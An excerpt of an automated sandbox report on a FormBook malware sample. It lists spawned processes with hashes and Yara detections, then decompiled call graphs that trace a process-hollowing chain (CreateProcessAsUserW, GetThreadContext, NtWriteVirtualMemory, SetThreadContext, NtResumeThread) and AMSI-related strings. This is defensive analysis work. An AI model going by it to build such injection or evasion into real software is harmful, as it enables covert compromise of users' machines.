                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:04:57:23
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:04:57:30
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\Tizelcdh.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Tizelcdh.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'364'480 bytes
                                                                                                  MD5 hash:09F4F91713BD6588465534822D5AD96C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:04:57:31
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:04:57:31
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:04:57:31
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:17
                                                                                                  Start time:04:57:45
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe"
                                                                                                  Imagebase:0x810000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:false

                                                                                                  Target ID:18
                                                                                                  Start time:04:57:47
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\proquota.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                                  Imagebase:0xb50000
                                                                                                  File size:39'424 bytes
                                                                                                  MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:false

                                                                                                  Target ID:19
                                                                                                  Start time:04:58:00
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe"
                                                                                                  Imagebase:0x810000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:false

                                                                                                  Target ID:20
                                                                                                  Start time:04:58:03
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\proquota.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                                  Imagebase:0xb50000
                                                                                                  File size:39'424 bytes
                                                                                                  MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  Target ID:21
                                                                                                  Start time:04:58:06
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe"
                                                                                                  Imagebase:0x810000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:23
                                                                                                  Start time:04:58:29
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                  Imagebase:0x7ff7f1e10000
                                                                                                  File size:676'768 bytes
                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true


                                                                                                    Execution Graph

                                                                                                    Execution Coverage:15.4%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:10.3%
                                                                                                    Total number of Nodes:290
                                                                                                    Total number of Limit Nodes:15
                                                                                                    execution_graph 25064 2b467bc 25881 2b2480c 25064->25881 25882 2b2481d 25881->25882 25883 2b24843 25882->25883 25884 2b2485a 25882->25884 25890 2b24b78 25883->25890 25899 2b24570 25884->25899 25887 2b2488b 25888 2b24850 25888->25887 25904 2b24500 25888->25904 25891 2b24b85 25890->25891 25898 2b24bb5 25890->25898 25892 2b24bae 25891->25892 25894 2b24b91 25891->25894 25895 2b24570 11 API calls 25892->25895 25910 2b22c44 11 API calls 25894->25910 25895->25898 25896 2b24b9f 25896->25888 25911 2b244ac 25898->25911 25900 2b24574 25899->25900 25901 2b24598 25899->25901 25924 2b22c10 25900->25924 25901->25888 25903 2b24581 25903->25888 25905 2b24504 25904->25905 25908 2b24514 25904->25908 25907 2b24570 11 API calls 25905->25907 25905->25908 25906 2b24542 25906->25887 25907->25908 25908->25906 25909 2b22c2c 11 API calls 25908->25909 25909->25906 25910->25896 25912 2b244b2 25911->25912 25914 2b244cd 25911->25914 25912->25914 25915 2b22c2c 25912->25915 25914->25896 25916 2b22c3a 25915->25916 25917 2b22c30 25915->25917 25916->25914 25917->25916 25919 2b22d19 25917->25919 25922 2b264cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25917->25922 25923 2b22ce8 7 API calls 25919->25923 25921 2b22d3a 25921->25914 25922->25919 25923->25921 25925 2b22c27 25924->25925 25928 2b22c14 25924->25928 25925->25903 25926 2b22c1e 25926->25903 25927 2b22d19 25933 2b22ce8 7 API calls 25927->25933 25928->25926 25928->25927 25932 2b264cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25928->25932 25931 2b22d3a 25931->25903 25932->25927 25933->25931 25934 2b4c2fc 25944 2b26518 25934->25944 25938 2b4c32a 25949 2b4bb48 timeSetEvent 25938->25949 25940 2b4c334 25941 2b4c342 GetMessageA 25940->25941 25942 2b4c336 TranslateMessage DispatchMessageA 25941->25942 25943 2b4c352 25941->25943 25942->25941 25945 2b26523 25944->25945 25950 2b24168 25945->25950 25948 2b2427c SysAllocStringLen SysFreeString 
SysReAllocStringLen 25948->25938 25949->25940 25951 2b241ae 25950->25951 25952 2b24227 25951->25952 25953 2b243b8 25951->25953 25964 2b24100 25952->25964 25956 2b243e9 25953->25956 25960 2b243fa 25953->25960 25969 2b2432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25956->25969 25958 2b243f3 25958->25960 25959 2b2443f FreeLibrary 25959->25960 25960->25959 25961 2b24463 25960->25961 25962 2b24472 ExitProcess 25961->25962 25963 2b2446c 25961->25963 25963->25962 25965 2b24110 25964->25965 25966 2b24143 25964->25966 25965->25966 25970 2b215cc 25965->25970 25974 2b25814 25965->25974 25966->25948 25969->25958 25978 2b21560 25970->25978 25972 2b215d4 VirtualAlloc 25973 2b215eb 25972->25973 25973->25965 25975 2b25824 GetModuleFileNameA 25974->25975 25977 2b25840 25974->25977 25980 2b25a78 GetModuleFileNameA RegOpenKeyExA 25975->25980 25977->25965 25979 2b21500 25978->25979 25979->25972 25981 2b25afb 25980->25981 25982 2b25abb RegOpenKeyExA 25980->25982 25998 2b258b4 12 API calls 25981->25998 25982->25981 25983 2b25ad9 RegOpenKeyExA 25982->25983 25983->25981 25986 2b25b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25983->25986 25985 2b25b20 RegQueryValueExA 25987 2b25b5e RegCloseKey 25985->25987 25988 2b25b40 RegQueryValueExA 25985->25988 25989 2b25bbb 25986->25989 25990 2b25c9e 25986->25990 25987->25977 25988->25987 25989->25990 25992 2b25bcb lstrlenA 25989->25992 25990->25977 25993 2b25be3 25992->25993 25993->25990 25994 2b25c30 25993->25994 25995 2b25c08 lstrcpynA LoadLibraryExA 25993->25995 25994->25990 25996 2b25c3a lstrcpynA LoadLibraryExA 25994->25996 25995->25994 25996->25990 25997 2b25c6c lstrcpynA LoadLibraryExA 25996->25997 25997->25990 25998->25985 25999 2b4bb3c 26002 2b3ec6c 25999->26002 26003 2b3ec74 26002->26003 26003->26003 28983 2b38704 LoadLibraryW 26003->28983 26005 2b3ec96 28988 2b22ee0 QueryPerformanceCounter 26005->28988 26007 2b3ec9b 26008 2b3eca5 InetIsOffline 26007->26008 26009 2b3ecc0 26008->26009 26010 2b3ecaf 26008->26010 26012 
2b24500 11 API calls 26009->26012 26011 2b24500 11 API calls 26010->26011 26013 2b3ecbe 26011->26013 26012->26013 26014 2b2480c 11 API calls 26013->26014 26015 2b3eced 26014->26015 26016 2b3ecf5 26015->26016 28991 2b24798 26016->28991 26018 2b3ed18 26019 2b3ed20 26018->26019 26020 2b3ed2a 26019->26020 29006 2b3881c 26020->29006 26023 2b2480c 11 API calls 26024 2b3ed51 26023->26024 26025 2b3ed59 26024->26025 26026 2b24798 11 API calls 26025->26026 26027 2b3ed7c 26026->26027 26028 2b3ed84 26027->26028 29019 2b246a4 26028->29019 29021 2b380c0 28983->29021 28985 2b3873d 29032 2b37cf8 28985->29032 28989 2b22ef8 GetTickCount 28988->28989 28990 2b22eed 28988->28990 28989->26007 28990->26007 28992 2b2479c 28991->28992 28993 2b247fd 28991->28993 28994 2b24500 28992->28994 28995 2b247a4 28992->28995 28999 2b24570 11 API calls 28994->28999 29001 2b24514 28994->29001 28995->28993 28996 2b247b3 28995->28996 28998 2b24500 11 API calls 28995->28998 29000 2b24570 11 API calls 28996->29000 28997 2b24542 28997->26018 28998->28996 28999->29001 29002 2b247cd 29000->29002 29001->28997 29003 2b22c2c 11 API calls 29001->29003 29004 2b24500 11 API calls 29002->29004 29003->28997 29005 2b247f9 29004->29005 29005->26018 29007 2b38830 29006->29007 29008 2b3884f LoadLibraryA 29007->29008 29068 2b2494c 29008->29068 29011 2b2494c 29012 2b38872 GetProcAddress 29011->29012 29013 2b38899 29012->29013 29014 2b37cf8 18 API calls 29013->29014 29015 2b388dd FreeLibrary 29014->29015 29016 2b388f5 29015->29016 29017 2b244d0 11 API calls 29016->29017 29018 2b38902 29017->29018 29018->26023 29020 2b246aa 29019->29020 29022 2b24500 11 API calls 29021->29022 29023 2b380e5 29022->29023 29046 2b3790c 29023->29046 29026 2b24798 11 API calls 29027 2b380ff 29026->29027 29028 2b38107 GetModuleHandleW GetProcAddress GetProcAddress 29027->29028 29029 2b3813a 29028->29029 29052 2b244d0 29029->29052 29033 2b24500 11 API calls 29032->29033 29034 2b37d1d 29033->29034 29035 2b3790c 12 API calls 29034->29035 29036 
2b37d2a 29035->29036 29037 2b24798 11 API calls 29036->29037 29038 2b37d3a 29037->29038 29057 2b38018 29038->29057 29041 2b380c0 15 API calls 29042 2b37d53 NtWriteVirtualMemory 29041->29042 29043 2b37d7f 29042->29043 29044 2b244d0 11 API calls 29043->29044 29045 2b37d8c FreeLibrary 29044->29045 29045->26005 29047 2b3791d 29046->29047 29048 2b24b78 11 API calls 29047->29048 29050 2b3792d 29048->29050 29049 2b37999 29049->29026 29050->29049 29056 2b2ba3c CharNextA 29050->29056 29054 2b244d6 29052->29054 29053 2b244fc 29053->28985 29054->29053 29055 2b22c2c 11 API calls 29054->29055 29055->29054 29056->29050 29058 2b24500 11 API calls 29057->29058 29059 2b3803b 29058->29059 29060 2b3790c 12 API calls 29059->29060 29061 2b38048 29060->29061 29062 2b38050 GetModuleHandleA 29061->29062 29063 2b380c0 15 API calls 29062->29063 29064 2b38061 GetModuleHandleA 29063->29064 29065 2b3807f 29064->29065 29066 2b244ac 11 API calls 29065->29066 29067 2b37d4d 29066->29067 29067->29041 29069 2b24950 GetModuleHandleA 29068->29069 29069->29011 29070 2b24e88 29071 2b24e95 29070->29071 29075 2b24e9c 29070->29075 29079 2b24bdc SysAllocStringLen 29071->29079 29076 2b24bfc 29075->29076 29077 2b24c02 SysFreeString 29076->29077 29078 2b24c08 29076->29078 29077->29078 29079->29075 29080 2b21c6c 29081 2b21d04 29080->29081 29082 2b21c7c 29080->29082 29083 2b21f58 29081->29083 29084 2b21d0d 29081->29084 29085 2b21cc0 29082->29085 29086 2b21c89 29082->29086 29087 2b21fec 29083->29087 29092 2b21f68 29083->29092 29093 2b21fac 29083->29093 29088 2b21d25 29084->29088 29101 2b21e24 29084->29101 29089 2b21724 10 API calls 29085->29089 29090 2b21c94 29086->29090 29128 2b21724 29086->29128 29095 2b21d2c 29088->29095 29098 2b21d48 29088->29098 29104 2b21dfc 29088->29104 29113 2b21cd7 29089->29113 29096 2b21724 10 API calls 29092->29096 29099 2b21fb2 29093->29099 29105 2b21724 10 API calls 29093->29105 29094 2b21e7c 29097 2b21724 10 API calls 29094->29097 29102 2b21e95 29094->29102 29100 2b21f82 
29096->29100 29103 2b21f2c 29097->29103 29107 2b21d79 Sleep 29098->29107 29115 2b21d9c 29098->29115 29120 2b21a8c 8 API calls 29100->29120 29122 2b21fa7 29100->29122 29101->29094 29101->29102 29106 2b21e55 Sleep 29101->29106 29103->29102 29121 2b21a8c 8 API calls 29103->29121 29109 2b21724 10 API calls 29104->29109 29108 2b21fc1 29105->29108 29106->29094 29110 2b21e6f Sleep 29106->29110 29111 2b21d91 Sleep 29107->29111 29107->29115 29108->29122 29123 2b21a8c 8 API calls 29108->29123 29119 2b21e05 29109->29119 29110->29101 29111->29098 29112 2b21ca1 29118 2b21cb9 29112->29118 29152 2b21a8c 29112->29152 29114 2b21a8c 8 API calls 29113->29114 29117 2b21cfd 29113->29117 29114->29117 29125 2b21a8c 8 API calls 29119->29125 29127 2b21e1d 29119->29127 29120->29122 29124 2b21f50 29121->29124 29126 2b21fe4 29123->29126 29125->29127 29129 2b21968 29128->29129 29130 2b2173c 29128->29130 29131 2b21938 29129->29131 29132 2b21a80 29129->29132 29140 2b217cb Sleep 29130->29140 29142 2b2174e 29130->29142 29138 2b21947 Sleep 29131->29138 29145 2b21986 29131->29145 29133 2b21684 VirtualAlloc 29132->29133 29134 2b21a89 29132->29134 29136 2b216bf 29133->29136 29137 2b216af 29133->29137 29134->29112 29135 2b2175d 29135->29112 29136->29112 29169 2b21644 29137->29169 29139 2b2195d Sleep 29138->29139 29138->29145 29139->29131 29140->29142 29144 2b217e4 Sleep 29140->29144 29142->29135 29143 2b2182c 29142->29143 29146 2b2180a Sleep 29142->29146 29150 2b215cc VirtualAlloc 29143->29150 29151 2b21838 29143->29151 29144->29130 29147 2b215cc VirtualAlloc 29145->29147 29149 2b219a4 29145->29149 29146->29143 29148 2b21820 Sleep 29146->29148 29147->29149 29148->29142 29149->29112 29150->29151 29151->29112 29153 2b21aa1 29152->29153 29154 2b21b6c 29152->29154 29156 2b21aa7 29153->29156 29159 2b21b13 Sleep 29153->29159 29155 2b216e8 29154->29155 29154->29156 29158 2b21c66 29155->29158 29162 2b21644 2 API calls 29155->29162 29157 2b21ab0 29156->29157 29161 2b21b4b Sleep 29156->29161 29166 2b21b81 
29156->29166 29157->29118 29158->29118 29159->29156 29160 2b21b2d Sleep 29159->29160 29160->29153 29163 2b21b61 Sleep 29161->29163 29161->29166 29164 2b216f5 VirtualFree 29162->29164 29163->29156 29165 2b2170d 29164->29165 29165->29118 29167 2b21c00 VirtualFree 29166->29167 29168 2b21ba4 29166->29168 29167->29118 29168->29118 29170 2b21681 29169->29170 29171 2b2164d 29169->29171 29170->29136 29171->29170 29172 2b2164f Sleep 29171->29172 29173 2b21664 29172->29173 29173->29170 29174 2b21668 Sleep 29173->29174 29174->29171

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 6797 2b38ba8-2b38bab 6798 2b38bb0-2b38bb5 6797->6798 6798->6798 6799 2b38bb7-2b38c9e call 2b2493c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6798->6799 6830 2b38ca4-2b38d7f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6799->6830 6831 2b3a6ef-2b3a759 call 2b244d0 * 2 call 2b24c0c call 2b244d0 call 2b244ac call 2b244d0 * 2 6799->6831 6830->6831 6875 2b38d85-2b390ad call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b230d4 * 2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c call 2b24d9c call 2b385d4 6830->6875 6984 2b39120-2b39441 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22ee0 call 2b22f08 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 
call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c GetThreadContext 6875->6984 6985 2b390af-2b3911b call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6875->6985 6984->6831 7093 2b39447-2b396aa call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3824c 6984->7093 6985->6984 7166 2b396b0-2b39819 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b384bc 7093->7166 7167 2b399b7-2b39a22 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7093->7167 7257 2b39843-2b398ae call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7166->7257 7258 2b3981b-2b39841 call 2b379ac 7166->7258 7192 2b39a28-2b39ba8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 7167->7192 7193 2b39a23 call 2b3881c 7167->7193 7192->6831 7297 2b39bae-2b39ca7 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38ab8 7192->7297 7193->7192 7266 2b398b4-2b399ab call 2b2480c call 2b2494c 
call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 7257->7266 7298 2b398af call 2b3881c 7257->7298 7258->7266 7337 2b399b0-2b399b5 7266->7337 7349 2b39cfb-2b3a453 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c SetThreadContext NtResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22c2c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38798 * 3 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7297->7349 7350 2b39ca9-2b39cf6 call 2b389b0 call 2b389a4 7297->7350 7298->7266 7337->7192 7575 2b3a458-2b3a6ea call 2b38798 * 2 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 * 5 
call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b37ecc call 2b38798 * 2 7349->7575 7350->7349 7575->6831
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                      • Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                    • GetThreadContext.KERNEL32(00000A74,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A
